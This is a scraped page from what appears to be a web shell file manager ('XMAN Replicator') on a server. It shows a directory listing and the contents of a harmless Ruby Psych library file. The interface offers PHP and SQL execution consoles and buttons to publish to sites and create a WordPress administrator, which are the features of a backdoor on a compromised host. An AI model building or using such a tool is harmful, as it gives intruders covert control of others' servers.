🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
ruby19
/
lib64
/
ruby
/
1.9.1
/
psych
/
handlers
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-03-03 22:48
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-03-03 22:48
🔄
🗑️
🗑️📁
⬇️
🔒
document_stream.rb
488 B
-rw-r--r--
2012-03-29 01:46
✏️
🔄
🗑️
⬇️
🔒
Edit: document_stream.rb
require 'psych/tree_builder' module Psych module Handlers class DocumentStream < Psych::TreeBuilder # :nodoc: def initialize &block super @block = block end def start_document version, tag_directives, implicit n = Nodes::Document.new version, tag_directives, implicit push n end def end_document implicit_end = !streaming? @last.implicit_end = implicit_end @block.call pop end end end end
Save
PHP Console
Execute
SQL Console
Execute